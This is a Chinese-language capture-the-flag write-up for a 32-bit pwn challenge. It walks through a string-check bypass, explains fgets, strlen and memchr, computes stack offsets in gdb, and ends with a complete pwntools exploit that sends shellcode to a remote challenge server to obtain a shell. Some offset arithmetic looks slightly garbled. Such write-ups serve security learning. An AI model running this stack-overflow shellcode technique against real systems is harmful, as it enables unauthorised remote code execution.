简单的checksec一下,NX没开,感觉要用shellcode
运行一下,输入name然后回显,程序结束。
IDA32反编译看一看,main
函数里有两个函数,header
函数就是输出个图形,程序的主要部分在chall
函数中。
查看一下chall
函数中的内容,第一个红框处给出了一个栈上地址;第二个红框处,是判断用户输入的字符串时候跟crashme
相同,相同才能进入vuln
函数,我们可以用b'crashme\x00'
构造一下,就绕过了。vuln函数中是一个简单的memcpy
栈溢出漏洞。
下面来解读一下这一部分程序的作用
先一次解读一下每个函数怎么使用
fgets函数详解:
# include <stdio.h>
char *fgets(char *s, int size, FILE *stream);
s是缓冲区的位置;
size是接收的大小;
stream可以使stdin,也可以是文件。
例子:
# include <stdio.h>
int main(void)
{
char str[20]; /*定义一个最大长度为19, 末尾是'\0'的字符数组来存储字符串*/
printf("请输入一个字符串:");
fgets(str, 7, stdin); /*从输入流stdin即输入缓冲区中读取7个字符到字符数组str中*/
printf("%s\n", str);
return 0;
}
结果:
请输入一个字符串:i love you
i love
多出的部分不会进入栈
strlen函数
这个就不多说了,复制字符串,遇到\x00
结束,计算长度时,不带上\x00。
memchr函数
描述
C 库函数 void *memchr(const void *str, int c, size_t n) 在参数 str 所指向的字符串的前 n 个字节中搜索第一次出现字符 c(一个无符号字符)的位置。
函数声明
void *memchr(const void *str, int c, size_t n)
参数
str – 指向要执行搜索的内存块。
c – 以 int 形式传递的值,但是函数在每次字节搜索时是使用该值的无符号字符形式。
n – 要被分析的字节数。
返回值
该函数返回一个指向匹配字节的指针,如果在给定的内存区域未出现字符,则返回 NULL。
再看一下题中程序
前面说到,我们要绕过下面的检测,必须要像这样构造payload
payload = b'crashme\x00' + shellcode + shellcode_addr
那么此时,strlen返回的结果是7,memchr在前七个字符里,找不到’\n’。所以,这一块的一串语句一点作用也没有,自己写了个c程序验证了一下,确实是这样。
此时,我们要做的就是找到栈上shellcode的地址和ebp的差值就行了,首先我们要找的是我们输入的字符串到ebp的差值。我们使用gdb打开文件,在vuln函数中有一个nop指令,我们在此处设置定点。
程序首先输出了一个栈上地址0xffffcbec
,输入crash,然后我们在程序运行到的地方使用stack 40
查看栈上的前40项。
输入点到ebp的距离太小,没办法放下shellcode,所以我们放到返回地址后面。
ebp到输入点的距离 = 0xffffcbc8 - 0xffffcbb2 = 22
shellcode的地址 = 0xffffcbec - 0xffffbd0 = 0x1c
构造的payload如下:
payload = b 'crashme\x00'.ljust(22+4,b'\x00')
payload += p32(s - 0x1c) + shellcode
完整exploit
from pwn import*
context.binary = './bin'
elf = context.binary
io = remote('node4.buuoj.cn',26866)
shellcode = asm(shellcraft.sh())
print(len(shellcode))
io.recvuntil(b'crash:')
s = int(io.recv(10),16)
print(hex(s))
payload = b'crashme\x00'.ljust(26,b'\x00')
payload += p32(s - 0x1c) + shellcode
io. sendlineafter(b'>' ,payload)
io. interactive( )